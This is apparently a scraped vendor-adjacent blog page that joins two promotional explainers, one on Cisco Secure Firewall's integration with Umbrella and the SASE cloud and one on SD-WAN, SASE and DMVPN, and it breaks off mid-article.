data center firewall

Cisco Secure Firewall with SASE Cloud

by Cisco Secure FirewallCisco Secure Firewall with SASE CloudNetworkPublicationsSASE Cloud

Cisco Secure Firewall with SASE Cloud

In today's digital era, network security is of paramount importance. With the rise of cloud-based services and remote work, businesses require a comprehensive security solution that not only protects their network but also ensures scalability and flexibility. Cisco Secure Firewall with SASE (Secure Access Service Edge) Cloud is a cutting-edge solution that combines the robustness of firewall protection with the agility of cloud-based security services. In this blog post, we will delve into the features and benefits of Cisco Secure Firewall with SASE Cloud.

Cisco Secure Firewall is an advanced network security solution designed to safeguard organizations from cyber threats. Built on industry-leading technology, it provides next-generation firewall capabilities, intrusion prevention, and application control. With granular security policies, deep visibility, and advanced threat intelligence, Cisco Secure Firewall empowers businesses to protect their networks from internal and external threats effectively.

SASE (Secure Access Service Edge) is a transformative approach to network security and connectivity. By converging networking and security functions into a unified cloud-based service, SASE offers organizations scalable and flexible security solutions. Cisco Secure Firewall with SASE Cloud takes advantage of this architecture, providing businesses with integrated security services that are delivered from the cloud. This enables seamless scalability, simplified management, and enhanced protection against evolving threats.

a) Cloud-Native Firewall: Cisco Secure Firewall with SASE Cloud leverages the power of cloud-native architecture, enabling organizations to easily scale their security infrastructure based on demand. It ensures consistent security policies across various locations and eliminates the need for hardware-based firewalls.

b) Advanced Threat Protection: With integrated threat intelligence and advanced analytics, Cisco Secure Firewall with SASE Cloud offers robust protection against sophisticated threats. It provides real-time threat detection and prevention, ensuring that businesses stay one step ahead of cybercriminals.

c) Simplified Management: The centralized management console allows organizations to effortlessly manage their security policies and configurations. From a single interface, administrators can efficiently deploy and enforce security policies, reducing complexity and enhancing operational efficiency.

As organizations continue to embrace digital transformation, the network landscape is constantly evolving. Cisco Secure Firewall with SASE Cloud future-proofs your network by providing a scalable and adaptable security solution. Its cloud-native architecture and integration with SASE enable businesses to stay agile and easily adapt to changing security requirements, ensuring long-term protection and resilience.

Matt Conran

Highlights: Cisco Secure Firewall with SASE Cloud

Understanding the Cisco Secure Firewall

Cisco Secure Firewall is a cutting-edge network security appliance that provides advanced threat protection, secure connectivity, and simplified management. It combines next-generation firewall capabilities with intrusion prevention, application visibility and control, and advanced malware protection. With its comprehensive suite of security features, it offers a multi-layered defense against a wide range of cyber threats.

Key Cisco Secure Firewall Features:

– Advanced Threat Protection: The Cisco Secure Firewall employs advanced intelligence to detect and prevent sophisticated attacks, including malware, ransomware, and zero-day exploits. Its integrated security technologies work in tandem to identify and mitigate threats in real-time, ensuring your network infrastructure’s highest level of protection.

– Secure Connectivity: The Cisco Secure Firewall enables secure remote access and site-to-site connectivity with built-in VPN capabilities. It establishes encrypted tunnels, allowing authorized users to access network resources from anywhere while ensuring data confidentiality and integrity.

– Application Visibility and Control: Gaining visibility into network traffic and effectively managing application usage is crucial for optimizing network performance and ensuring security. The Cisco Secure Firewall offers granular application control, allowing administrators to define policies and prioritize critical applications while restricting or blocking unauthorized ones.

**Broken Firewall Rules**

One-third of your firewall rules are broken. You can use the Cisco AI Assistant for Security to identify and report policies, augment troubleshooting, and automate policy lifecycle management with the Cisco AI Assistant for Security. Also, take back control of your encrypted traffic and application environments. Cisco Talos lets you see and detect more across your infrastructure while ensuring security resilience across billions of signals.

**Advanced Clustering & HA**

This enabled you to drive efficiency at scale. Secure Firewall’s advanced clustering, high availability, and multi-instance capabilities allow you to scale, be reliable, and be productive. Finally, by integrating network, microsegmentation, and app security, Secure Firewall makes zero-trust achievable and cost-effective. It automates access and anticipates what comes next.

Knowledge Check: Cisco’s Firewalling

Cisco integrated its original Sourcefire’s next-generation security technologies into its existing firewall solutions, the Adaptive Security Appliances (ASA). In that early implementation, Sourcefire technologies ran as a separate service module. Later, Cisco designed new hardware platforms to support Sourcefire technologies natively.

They are named Cisco Firepower, later rebranded as Cisco Secure Firewall, which is the current implementation of Firewalling. In the new implementation, Cisco converges Sourcefire’s next-generation security features, open-source Snort, and ASA’s firewall functionalities into a unified software image. This unified software is called the Firepower Threat Defense (FTD). After rebranding, this software is now known as the Cisco Secure Firewall.

Example Security Technology: IPS IDS

Understanding Suricata

Suricata is an open-source network threat detection engine that offers high-performance intrusion detection and prevention capabilities. Built with speed, scalability, and robustness, Suricata analyzes network traffic and detects various threats, including malware, exploits, and suspicious activities. Its multi-threaded architecture and rule-based detection mechanism make it a formidable weapon against cyber threats.

Suricata boasts an impressive array of features that elevate its effectiveness in network security. Suricata covers various security needs, from protocol analysis and content inspection to file extraction and SSL/TLS decryption. Its extensive rule set allows for fine-grained control over network traffic, enabling tailored threat detection and prevention. Additionally, Suricata supports various output formats, making it compatible with other security tools and SIEM solutions.

Understanding SASE Cloud

Cisco SASE Cloud, short for Secure Access Service Edge Cloud, is a comprehensive networking and security platform that combines wide area networking (WAN) capabilities with robust security features. It offers a unified solution for remote access, branch connectivity, and cloud security, all delivered from the cloud. This convergence of networking and security into a single cloud-native platform allows organizations to simplify their infrastructure, reduce costs, and enhance agility.

SASE Cloud Key Points:

Enhanced Security: One of Cisco SASE Cloud’s standout features is its advanced security capabilities. By leveraging a combination of next-generation firewalls, secure web gateways, data loss prevention, and other security services, it provides comprehensive protection against cyber threats. With SASE Cloud, organizations can ensure secure access to applications and data from anywhere, anytime, without compromising security.

Scalability and Flexibility: Cisco SASE Cloud offers unmatched scalability and flexibility. As an organization grows, SASE Cloud can quickly adapt to evolving needs. Whether it’s adding new branches, onboarding remote employees, or expanding into new markets, the cloud-native architecture of SASE Cloud enables seamless scalability without the need for extensive infrastructure investments.

Simplified Management: Managing complex networking and security infrastructure can be daunting for IT teams. However, Cisco SASE Cloud simplifies this process by centralizing management and providing a single pane of glass for visibility and control. This streamlined approach allows IT teams to monitor and manage network traffic efficiently, apply security policies, and troubleshoot issues, improving operational efficiency.

Secure Access Anywhere & Anytime

Converged Networking and Security: Cisco SASE combines networking and security functions, such as secure web gateways, firewalls, and data loss prevention, into a single solution. This convergence eliminates the need for multiple standalone appliances, reducing complexity and improving operational efficiency.

Cloud-Native Architecture: Built on a cloud-native architecture, Cisco SASE leverages the scalability and flexibility of the cloud. This enables organizations to dynamically adapt to changing network demands, scale their resources as needed, and integrate new security services without significant infrastructure investments.

Enhanced User Experience and Security: With Cisco SASE, users can enjoy a seamless and secure experience regardless of location or device. Cisco SASE protects users and data from threats through its integrated security capabilities, including zero-trust network access and secure web gateways, ensuring a safe and productive digital environment.

Related: For additional pre-information, you may find the following helpful:

  1. SD WAN SASE
  2. SASE Model
  3. Zero Trust SASE
  4. SASE Solution
  5. Distributed Firewalls
  6. SASE Definition

Evolution of the Network Security

In the past, network security was typically delivered from the network using the Firewall. However, these times, network security extends well beyond just firewalling. We now have different points in the infrastructure that we can use to expand our security posture while reducing the attack surface.

You would have commonly heard of Cisco Umbrella Firewall and SASE, along with Cisco Secure Workload security, which can be used with your Cisco Secure firewall, which is still deployed at the network’s edge. Unfortunately, you can’t send everything to the SASE cloud.

You will still need an on-premise firewall, such as the Cisco Secure Firewall, that can perform standard stateful filtering, intrusion detection, and threat protection. This post will examine the Cisco Secure Firewall and its integration with Cisco Umbrella via the SASE Cloud. Firstly, let us address some basics of firewalling.

A. Redesigning Traditional Security:
Let’s examine the evolution of network security before we get into some inbound and outbound traffic use cases. Traditionally, the Firewall was placed at the network edge, acting as a control point for the network’s ingress/egress point. The Firewall was responsible for validating communications with rule sets and policies created and enforced at this single point of control to ensure that desired traffic was allowed into and out of the network and undesirable traffic was prevented. This type of design was known as the traditional perimeter approach to security.

B: Numerous Firewalling challenges:
Today, branch office locations, remote employees, and increasing use of cloud services drive more data away from the traditional “perimeter,” The cloud-first approach completely bypasses the conventional security control point.
Further, the overwhelming majority of business locations and users also require direct access to the Internet, where an increasing prevalence of cloud-based critical applications and data now lives. As a result, applications and data become further de-centralized, and networks become more diverse.

C: Conventional Appliance Sprawl:
This evolution of network architectures has dramatically increased our attack surfaces and did the job of protecting more complicated ones. So, we started to answer this challenge with point solutions. Typically, organizations have attempted to address these challenges by adding the "best" point security solution to address each new problem as it emerges. 

Because of this approach, we have seen tremendous device sprawl. Multiple security products from different vendors can pose significant management problems for network security teams, eventually leading to complexity and blind spots.

Consequently, our "traditional" firewall devices are being augmented by a mixture of physical and virtual appliances—some are embedded into the network. In contrast, others are delivered as a service, host-based, or included within public cloud environments. Regardless of the design, you will stall inbound and outbound traffic to protect.

Matt Conran

**Basics of Firewalling**

A firewall is an entity or obstacle deployed between two structures to prevent fire from spreading from one system to another. This term has been taken into computer networking, where a firewall is a software or hardware device that enables you to filter unwanted traffic and restrict access from one network to another. The Firewall is a vital network security component in securing network infrastructure and can take many forms. For example, we can have a host-based or network-based Firewall.

Firewall types
Diagram: Firewall types. Source is IPwithease

Firewalling Types:

A. Host-based Firewall

A host-based firewall service is installed locally on a computer system. In this case, the end user’s computer system takes the final action—to permit or deny traffic. Every operating system has some Firewall. It consumes the resources of a local computer to run the firewall services, which can impact the other applications running on that particular computer. Furthermore, in a host-based firewall architecture, traffic traverses all the network components and can consume the underlying network resources until the traffic reaches its target.

B. Network-based Firewall

On the other hand, a network-based firewall can be entirely transparent to an end user and is not installed on the computer system. Typically, you deploy it in a perimeter network or at the Internet edge where you want to prevent unwanted traffic from entering your network. The end-user computer system remains unaware of any traffic control by an intermediate device performing the filtering. In a network-based firewall deployment, you do not need to install additional software or daemon on the end-user computer systems. However, it would help if you used both firewall types for a defense-in-depth approach.

The early generation of firewalls could allow or block packets only based on their static elements, such as a packet’s source address, destination address, source port, destination port, and protocol information. These elements are also known as the 5-tuple.

Example Technology Cisco Packet Filter

### Implementing Packet Filtering in Your Network

To effectively implement packet filtering, it’s crucial to have a clear understanding of your network architecture and traffic patterns. Begin by identifying the critical assets that need protection and the types of traffic that should be allowed. Develop a detailed access list, considering both inbound and outbound traffic.

C. Stateless Firewalling

When an early-generation firewall examined a particular packet, it was unaware of any prior packets that passed through it because it was agnostic of the Transmission Control Protocol (TCP) states that would have signaled this. Due to the nature of its operation, this type of Firewall is called a stateless firewall.

A stateless firewall is unable to distinguish the state of a particular packet. So, for example, it could not determine if a packet is part of an existing connection, trying to establish a legitimate new connection, or whether it is a manipulated, rogue packet. We then moved to a stateful inspection firewall and an application-aware form of next-generation firewalling.

D. Stateful Firewaling

The stateful inspection examines the TCP and UDP port numbers, while an application-aware firewall examines Layer 7. So now we are at a stage where the Firewall does some of everything, such as the Cisco Secure Firewall.

CBAC Firewall CBAC Firewall

**Firewalling Use Cases**

1.Inbound Use case

The Firewall picks up every packet, looks at different fields, examines for signatures that could signal an attack is in process, and then re-packs and sends the packet out its interfaces. Still, the technique is relevant. It tracks inbound traffic to tell if someone outside or inside is accessing the private applications you want to keep secure. So, looking at every packet is still relevant for the inbound traffic use case. 

While everything is encrypted these days, you need to decrypt traffic to gain security value. Deep Packet Inspection (DPI) is still very relevant for inbound traffic. So, we will continue to decrypt inbound traffic for complete application threat protection with the hope of minimal functional impact.

Example Technology: Sensitive Data Protection with Google Cloud

Sensitive data protection

2.Outbound Use Case

Then, we need to look at outbound traffic. Here, things have changed considerably. Some users need to catch up to a firewall and then go to applications hosted outside the protection of your on-premise security stack and network. These are applications in the cloud, such as SaaS applications, that do not like when the network devices in the middle interfere with the traffic.

Therefore, applications such as Office365 make an effort with their design to reduce the chances of the potential of any network and security device from peeking into their traffic. For example, you could have mutual certificate authentication with the service in the cloud. So, there are a couple of options here besides the traditional DPI use case for inbound traffic use case.

**Improving Security: Understanding the network**

Understanding Network Scanning

Network scanning involves exploring computer networks to gather information about connected devices, open ports, and system vulnerabilities. Cybersecurity professionals gain valuable insights into the network’s architecture, potential entry points, and security risks by utilizing various scanning techniques and tools.

There are different types of network scans, each serving a specific purpose. Port scans identify open ports and services running on them, while vulnerability scans aim to pinpoint weaknesses within network devices, applications, or configurations. Additionally, network mapping scans visually represent the network’s structure, aiding in better understanding and management.

Example: Cisco Secure Firewall 3100

Cisco has the Cisco Secure Firewall 3100, a mid-range model that can be an Adaptive Security Appliance (ASA) for standard stateful firewall inspection or Firewall Threat Defense (FTD) software.

So it can perform one or the other. It also has clustering, a multi-instance firewall, and high availability, which we will discuss. In addition, the Cisco Series Firewall throughput range addresses use cases from the Internet edge to the data center and private cloud.

Cisco Secure Firewall 3100 is an advanced next-generation firewall that provides comprehensive security and high performance for businesses of all sizes. Its advanced security features can protect an organization’s most critical assets, from data, applications, and users to the network infrastructure. Cisco Secure Firewall 3100 offers an integrated threat defense system that combines intrusion prevention, application control, and advanced malware protection. This firewall is designed to detect and block malicious traffic and protect your network from known and unknown threats.

Secure Firewall
Diagram: Cisco Secure Firewall. The source is Cisco.

Adaptive Security Appliance (ASA) and Firewall Threat Defense (FTD)

The platforms can be deployed in Firewall (ASA) and dedicated IPS (FTD) modes. In addition, the 3100 series supports Q-in-Q (stacked VLAN) up to two 802.1Q headers in a packet for inline sets and passive interfaces. The platform also supports FTW (fail-to-wire) network modules.

Remember that you cannot mix and match ASA and FTD modes. However, you can make FTD operate similarly to the ASA. For example, the heart of the Cisco Secure Firewall is Snort, one of the most popular open-source intrusion detection and prevention systems capable of real-time traffic inspection. 

**IPS Engine – Snort**

What’s powerful about the Cisco Secure Firewall is its high decryption performance due to the Crypto Engine. The Firewall has an architecture built around decrypting traffic and has impressive performance. In addition, you can tune your CPU cores to perform more traditional ASA functionality, such as termination IPsec and some stateful firewall inspection.

In such a scenario, we have an IPS engine ( based on Snort ) but give it only 10%. We can provide 90% of the data plane to traditional firewalling in this case. So, a VPN headend or basic stateful Firewall would use more data plane cores.

On the other hand, any heavy IPS and file inspection would be biased toward more “Snort” Cores. Snort provides the IPS engine to tailor the performance profiles to your liking. We have configurable CPU Core allocation, which can be set statically, not dynamically.

Secure Firewalling Features:

1.Secure Firewall Feature: Clustering

Your Secure Firewall deployment can also expand as your organization grows to support its network growth. You do not need to replace your existing devices for additional horsepower; you can add threat defense devices to your current deployment and group them into a single logical cluster to support additional throughput. 

A clustered logical device offers higher performance, scalability, and resiliency simultaneously. You can create a cluster between multiple chassis or numerous security modules of the same chassis. When a cluster is built with various independent chassis, it is called inter-chassis clustering.

2.Secure Firewall Feature: Multi-Instance

The Secure Firewall offers multi-instance capability powered by Docker container technology. It enables you to create and run multiple application instances using a small subset of a chassis’s hardware resources. You can independently manage the threat defense application instances as separate threat defense devices. Multi-instance capability enables you to isolate many critical elements.

3.Secure Firewall Feature: High Availability

In a high-availability architecture, one device operates actively while the other stays on standby. A standby device does not actively process traffic or security events. For example, suppose a failure is detected in the active device, or there’s any discontinuation of keepalive messages from the active device.

In that case, the standby device takes over the role of the active device and starts operating actively to maintain continuity in firewall operations. An active device periodically sends keepalive messages and replicates its configurations to a standby device. Therefore, the communication channel between the peers of a high-availability pair must be robust and with much less latency. 

Exploreing SASE Cloud

One way to examine SaaS-based applications and introduce some cloud security is by using Cisco Umbrella with the SASE Cloud. The SASE Cloud can also have a cloud access security broker known as Cloudlock. The Cisco Umbrella CASB  is like a broker that hooks into the application’s backend to determine users’ actions. It does this by asking for the service via an Application Programming Interface (API) call and not by DPI.

Cisco Umbrella
Diagram: Cisco Umbrella. Source is Cisco

Cisco Cloudlock is part of the SASE cloud that provides a cloud-native cloud access security broker (CASB) that protects your cloud users, data, and apps. Cloud lock’s simple, open, and automated approach uses APIs to manage the risks in your cloud app ecosystem. With Cloudlock, you can more quickly combat data breaches while meeting compliance regulations.

Cisco Umbrella also has a firewall known as the Cisco Umbrella Firewall. We can take the Cisco Umbrella Firewall to improve its policy decision using information gleaned from the CASB. In addition, we map network flows to a specific user action via cloud applications and CASB solutions. So this is one area you can look into.

Extending the Firewall with SASE Cloud

Cisco Umbrella Firewall:

The SASE Cloud with Cisco Umbrella firewall is a good solution that can be combined with the on-premise Firewall. So, if you have FDT at the edge of your network, why would you need to introduce a Cisco Umbrella Firewall or any other SASE technologies? Or if you have a SASE cloud with a Cisco Umbrella, why would you need FDT?

First, it makes sense to process specific traffic locally. However, the two categories of traffic that Cisco Umbrella excels in beyond any firewall are DNS and CASB. Your edge firewall is less effective against some outbound traffic, such as dynamically changing DNS and undecryptable TLS connections. DNS is Cisco Umbrella’s bread and butter.

DNS Request Proceed The IP Connection

Knowledge Check: Cisco DNS-layer security.

DNS requests precede the IP connection, enabling DNS resolvers to log requested domains over any port or protocol for all network devices, office locations, and roaming users. As a result, you can monitor DNS requests and subsequent IP connections to improve the accuracy and detection of compromised systems, security visibility, and network protection. 

You can also block requests to malicious destinations before a connection is even established, thus stopping threats before they reach your network or endpoints. Cisco Umbrella under the hood can clean your DNS traffic and stop the attacks before they get to any malicious connection. 

SASE Cloud: Cisco Umbrella CASB.

Also, you can not decrypt SaaS-based applications and CASB on the edge firewall. The Firewall can’t detect if the user is carrying out any data exfiltration.

With SASE cloud, Cisco Umbrella, and its integrated CASB offering, we get better visibility in this type of traffic and apply a risk category to certain kinds of activity. So now we have an excellent combination. The cloud security stack does what it does best: processing cycles away from the Firewall.

**Cisco Umbrella Integration**

With the Cisco Secure Firewall, they have nice DNS redirection to the Cisco Umbrella Firewall. The on-premise Firewall communicates API to Cisco Umbrella and pulls in the existing DNS policy so the Umbrella DNS policies can be used with the current firewalling policies.  Recently, Cisco has gone one step further, and you can have a SIG tunnel between the Cisco Secure Firewall Management Center (FMC) and the Cisco Umbrella.

So there is a tunnel and have per tunnel IKE ID and bundle multiple tunnels to Umbrella.  Now, we can have load balance across multi-spoke tunnels with per-tunnel custom IKE ID. Once set up, we can have certain kinds of traffic going down each tunnel.

**Endpoint controls**

Then, we have the endpoint, such as your desktop computer or phone. We can collect a wealth of information about each network connection. This information can be fed into the Firewall via metadata. So you can provide both the Cisco Umbrella Firewall and the Cisco Secure Firewall. Again, for improved policy.

The Firewall, either the Cisco Secure Firewall or the Cisco Umbrella Firewall, does not need to decrypt any traffic. Instead, we can get client context discovery via passive fingerprinting using an agent on the endpoint. We can get a wealth of attributes you can’t get with DPI. So we can move from DPI to everything and augment that with all other components to get better visibility.

Summary: Cisco Secure Firewall with SASE Cloud

In today’s rapidly evolving digital landscape, organizations face the challenge of ensuring robust security while embracing the benefits of cloud-based solutions. Cisco Secure Firewall with SASE (Secure Access Service Edge) Cloud offers a comprehensive and streamlined approach to address these concerns. This blog post delved into the features and benefits of this powerful combination, highlighting its ability to enhance security, simplify network management, and optimize performance.

Understanding Cisco Secure Firewall

Cisco Secure Firewall serves as the first line of defense against cyber threats. Its advanced threat detection capabilities and deep visibility into network traffic provide proactive protection for organizations of all sizes. Cisco Secure Firewall ensures a secure network environment by preventing unauthorized access, blocking malicious content, or detecting and mitigating advanced threats.

Introducing SASE Cloud

On the other hand, SASE Cloud revolutionizes how organizations approach network and security services. SASE Cloud offers a scalable and agile solution by converging network functions and security services into a unified cloud-native platform. It combines features such as secure web gateways, data loss prevention, firewall-as-a-service, and more, all delivered from the cloud. This eliminates the need for costly on-premises infrastructure and allows businesses to scale their network and security requirements effortlessly.

The Power of Integration

When Cisco Secure Firewall integrates with SASE Cloud, it creates a formidable combination that enhances security posture while delivering optimal performance. The integration allows organizations to extend their security policies seamlessly across the entire network infrastructure, including remote locations and cloud environments. This unified approach ensures consistent security enforcement, reducing potential vulnerabilities and simplifying management overhead.

Simplified Network Management

One of the key advantages of Cisco Secure Firewall with SASE Cloud is its centralized management and control. Administrators can easily configure and enforce security policies, monitor network traffic, and gain valuable insights through a single glass pane of glass. This simplifies network management, reduces complexity, and enhances operational efficiency, enabling IT teams to focus on strategic initiatives rather than mundane tasks.

Conclusion:

In conclusion, the combination of Cisco Secure Firewall with SASE Cloud provides organizations with a robust and scalable security solution that meets the demands of modern networks. By integrating advanced threat detection, cloud-native architecture, and centralized management, this potent duo empowers businesses to navigate the digital landscape confidently. Experience the benefits of enhanced security, simplified management, and optimized performance by adopting Cisco Secure Firewall with SASE Cloud.

Cisco Umbrella

SD-WAN SASE

by Publications

SD WAN SASE

SD-WAN, or Software-Defined Wide Area Networking, is a transformative technology that enhances network connectivity for geographically dispersed businesses. By utilizing software-defined networking principles, SD-WAN empowers organizations to optimize their wide area network infrastructure, reduce costs, and improve application performance. The key features of SD-WAN include dynamic path selection, centralized management, and enhanced security capabilities.

Secure Access Service Edge, or SASE, is an emerging architectural framework that combines network security and wide area networking into a single cloud-native service. SASE offers a holistic approach to secure network connectivity, integrating features such as secure web gateways, firewall-as-a-service, zero-trust network access, and data loss prevention. By converging security and networking functions, SASE simplifies network management, improves performance, and enhances overall security posture.

Implementing SD-WAN and SASE brings forth a multitude of benefits for businesses. Firstly, organizations can achieve cost savings by leveraging cheaper internet links and reducing reliance on expensive MPLS connections. Secondly, SD-WAN and SASE improve application performance through intelligent traffic steering, ensuring optimal user experience. Moreover, the centralized management capabilities of these technologies simplify network operations, reducing complexity and enhancing agility.

To implement SD-WAN and SASE effectively, businesses need to consider several key factors. This includes evaluating their existing network infrastructure, defining their security requirements, and selecting the appropriate vendors or service providers. It is crucial to design a well-thought-out migration plan and ensure seamless integration with existing systems. Additionally, comprehensive testing and monitoring are essential to guarantee a smooth transition and ongoing success.

As technology continues to evolve, the future of network connectivity lies in the hands of SD-WAN and SASE. These innovative solutions enable businesses to embrace digital transformation, support remote workforces, and adapt to rapidly changing business needs. The integration of artificial intelligence and machine learning capabilities within SD-WAN and SASE will further enhance network performance, security, and automation.

SD-WAN and SASE are revolutionizing network connectivity by providing businesses with scalable, cost-effective, and secure solutions. The combination of SD-WAN's optimization capabilities and SASE's comprehensive security features creates a powerful framework for modern network infrastructures. As organizations navigate the ever-evolving digital landscape, SD-WAN and SASE will undoubtedly play a crucial role in shaping the future of network connectivity.

Matt Conran

Highlights: SD WAN SASE

SD-WAN SASE

Understanding SD-WAN

SD-WAN is a networking approach that utilizes software-defined principles to simplify the management and operation of a wide area network. It replaces conventional hardware-based network appliances with software-based solutions, enabling centralized control and automation of network resources. By separating the control plane from the data plane, SD-WAN optimizes traffic routing and provides enhanced visibility and control over network performance.

One of SD-WAN’s key advantages is its ability to enhance network performance. With traditional WAN architectures, network traffic may suffer from congestion and latency issues, leading to decreased performance and user dissatisfaction.

**Dynamically Routing**

SD-WAN tackles these challenges by dynamically routing traffic across multiple paths, optimizing the utilization of available bandwidth. Additionally, it offers intelligent traffic prioritization and Quality of Service (QoS) mechanisms, ensuring that critical applications receive the necessary bandwidth and delivering an improved user experience.

**Advanced Security Features**

Security is a critical concern for any network infrastructure. SD-WAN addresses this concern by incorporating advanced security features. Encryption protocols, secure tunneling, and traffic segmentation are some of the security mechanisms provided by SD-WAN solutions.

Furthermore, SD-WAN offers improved network resilience by enabling automatic failover and seamless traffic rerouting in case of link failures. This ensures high availability and minimizes the impact of network disruptions on critical business operations.

Cisco SD-WAN Cloud hub

SD-WAN Cloud Hub serves as a centralized networking architecture that enables businesses to connect their various branch locations to the cloud. It leverages the software-defined networking (SDN) capabilities of SD-WAN technology to establish secure and optimized connections over the internet. With SD-WAN Cloud Hub, businesses can achieve superior network performance, reduced latency, and enhanced security compared to traditional WAN solutions.

– Enhanced Network Performance: SD-WAN Cloud Hub optimizes network traffic and intelligently routes it through the most efficient path, resulting in improved application performance and user experience.

– Increased Security: With built-in encryption and secure tunnels, SD-WAN Cloud Hub ensures the confidentiality and integrity of data transmitted between branch locations and the cloud.

– Simplified Network Management: The centralized control and management capabilities of SD-WAN Cloud Hub make it easy for businesses to monitor and configure their network settings, reducing complexity and operational costs.

Example WAN Performance & PfR:

Understanding Performance-Based Routing

Performance-based routing is a dynamic method that leverages network monitoring tools and algorithms to determine the most efficient path for data transmission. Unlike traditional routing protocols that rely on static metrics such as hop count, performance-based routing considers latency, packet loss, and bandwidth availability factors. Constantly evaluating network performance enables routers to make informed decisions in real time, ensuring optimal data flow.

1: Enhanced User Experience: With performance-based routing, data packets are directed through the fastest and most reliable paths, minimizing latency and packet loss. This results in a superior user experience, faster page load times, smoother video streaming, and reduced buffering.

2: Increased Network Efficiency: Performance-based routing optimizes bandwidth usage by dynamically adapting to changing network conditions. It automatically reroutes traffic away from congested links, distributing it evenly and reducing bottlenecks. This leads to improved overall network efficiency and better utilization of available resources.

3: Improved Reliability and Redundancy: Performance-based routing enhances network reliability by actively monitoring link performance. In case of link failures or degraded performance, it can dynamically reroute traffic to alternative paths, ensuring seamless connectivity and minimizing service disruptions.

SD-WAN with DMVPN Phase 3

**Understanding DMVPN Phase 3**

DMVPN, short for Dynamic Multipoint VPN, is a Cisco technology that simplifies the deployment of VPN networks. Building upon the previous phases, DMVPN Phase 3 introduces several key enhancements. One notable feature is the inclusion of the Next Hop Resolution Protocol (NHRP), which facilitates the dynamic mapping of IP addresses to physical addresses, optimizing network routing and reducing latency.

**Implementing DMVPN Phase 3**

Implementing DMVPN Phase 3 requires careful planning and configuration. The process involves establishing a hub-and-spoke network topology, where the hub acts as a central point of communication, and the spokes connect to it. Configuring NHRP and IPsec encryption are crucial steps in deploying DMVPN Phase 3. Organizations can seamlessly integrate DMVPN Phase 3 into their network infrastructure with proper guidance and expertise.

Understanding SASE

SASE, pronounced “sassy,” is a transformative approach to network security that combines network and security functionalities into a unified cloud-based service. It converges wide area networking (WAN) capabilities with comprehensive security functions, all delivered as a service. SASE aims to simplify and streamline network security, providing organizations with a more efficient and scalable solution.

–SASE Components:

SASE is built upon several key components that work together harmoniously. These include secure web gateways (SWG), cloud access security brokers (CASB), firewall-as-a-service (FWaaS), zero-trust network access (ZTNA), and software-defined wide area networking (SD-WAN). Each component is vital in creating a to robust and comprehensive security framework.

–SASE Solutions:

SASE solutions generally consist of a networking component, such as a software-defined wide area network (SD-WAN), plus a wide range of security components offered in cloud-native format.

These security components are added to secure the network’s communication from end to end, provide consistent policy management and enforcement, add security analytics, and enable an integrated administration capability to manage every connection from everything to every resource.

Some of these features commonly include Zero Trust Network Access (ZTNA), which means a Zero Trust approach to security is one of the security components that enables SASE. Therefore, SASE is dependent on Zero Trust.

–Note: The first layer of defense:

I always consider the DNS layer security to be the first layer. Every transaction needs a DNS request, so it’s an excellent place to start your security. If the customer needs an additional measure of defense that can introduce the other security functions that the Cisco Umbrella offers. You turn on and off security functions based on containers as you see fit.

Cloud DNS with Google 

Example SASE Technology: IPS IDS

Understanding Suricata

Suricata is an open-source intrusion detection and prevention system (IPS/IDS) for high-speed network traffic analysis. It utilizes multi-threading and a rule-based detection engine to scrutinize network traffic for potential threats, providing real-time alerts and prevention measures. Its versatility extends beyond traditional network security, making it a valuable asset for individuals and organizations.

Suricata offers extensive features that enable efficient threat detection and prevention. Its rule-based engine allows for customizable rule sets, ensuring tailored security policies. Additionally, Suricata supports various protocols, including TCP, UDP, and ICMP, further enhancing its ability to monitor network traffic comprehensively. Advanced features like file extraction, SSL/TLS decryption, and protocol detection add another layer of depth to its capabilities.

The Synergy of SASE and SD-WAN Integration

When SASE and SD-WAN are combined, a networking solution delivers the best of both worlds. By integrating SD-WAN capabilities into the SASE architecture, organizations can simultaneously leverage the benefits of secure connectivity and optimized network performance. This integration allows for intelligent traffic routing based on security policies, ensuring that sensitive data flows through secure channels while non-critical traffic takes advantage of optimized paths.

One significant advantage of integrating SASE and SD-WAN is simplified network management. With a unified platform, IT teams can centrally manage and monitor network connectivity, security policies, and performance. This centralized approach eliminates the need for complex and fragmented network management tools, streamlining operations and reducing administrative overhead.

**Use Case: DMVPN and SD-WAN**

**Example: DMVPN over IPSec**

DMVPN is a tunneling protocol that allows for the creation of virtual private networks over a public network infrastructure. Unlike traditional VPNs, DMVPN offers a dynamic and scalable architecture, making it ideal for large-scale deployments. By leveraging multipoint GRE (Generic Routing Encapsulation), DMVPN enables direct communication between remote sites without needing a full-mesh topology. This significantly simplifies network management and reduces overhead.

**DMVPN & Security**

IPsec, short for Internet Protocol Security, is a widely adopted protocol suite that provides secure communication over IP networks. It offers confidentiality, integrity, and authentication services, ensuring that data transmitted between network nodes remains secure and tamper-proof. IPsec establishes a secure channel between DMVPN nodes by encrypting IP packets and protecting sensitive information from unauthorized access.

**Combining DMVPN and IPsec**

The combination of DMVPN and IPsec benefits organizations seeking robust and scalable networking solutions. Firstly, DMVPN’s dynamic architecture allows for easy scalability, making it suitable for businesses of all sizes. Additionally, using IPsec ensures end-to-end security, safeguarding data from potential threats. Moreover, by eliminating the need for a full-mesh topology, DMVPN reduces administrative overhead, simplifying network management processes.

DMVPN Single Hub, Dual Cloud Architecture

The single hub, dual cloud configuration takes DMVPN to the next level by enhancing redundancy and performance. This architecture connects a central hub to two separate cloud providers, creating a highly resilient and highly available network infrastructure. This setup ensures the network remains operational even if one cloud provider experiences downtime, minimizing disruptions and maximizing uptime.

a. Enhanced Redundancy: The single hub, dual cloud DMVPN architecture significantly improves network redundancy by connecting to two cloud providers. In a cloud provider outage, traffic is automatically rerouted to the alternate cloud, ensuring seamless connectivity and minimal impact on business operations.

b. Optimized Performance: With dual cloud connectivity, the network can distribute traffic intelligently, leveraging the resources of both cloud providers. This load balancing enhances network performance, efficiently utilizing available bandwidth and minimizing latency.

c. Scalability: Single hub, dual cloud DMVPN offers scalability, enabling businesses to expand their network infrastructure as their requirements grow easily. New sites can seamlessly integrate into the architecture without compromising performance or security.

Related: Before you proceed, you may find the following post helpful for pre-information:

  1. SASE Definition
  2. DNS Security Solutions
  3. Cisco Umbrella CASB
  4. SASE Model
  5. Secure Firewall
  6. SASE Visibility
  7. Zero Trust SASE

SASE Networking

Starting SASE Networking

We have a common goal to achieve this. To move users closer to the cloud services they are accessing. However, traffic sent over the Internet is all best-effort and is often prone to bad actors’ attacks and unforeseen performance issues. Over 14,000 BGP incidents occurred last year, so cloud access over the Internet varies if BGP is unstable.

No one approach solves everything, but deploying SASE ( secure access service edge ) will give you a solid posture. Secure Access Service Edge deployment is not something you take out of a box and plug in.

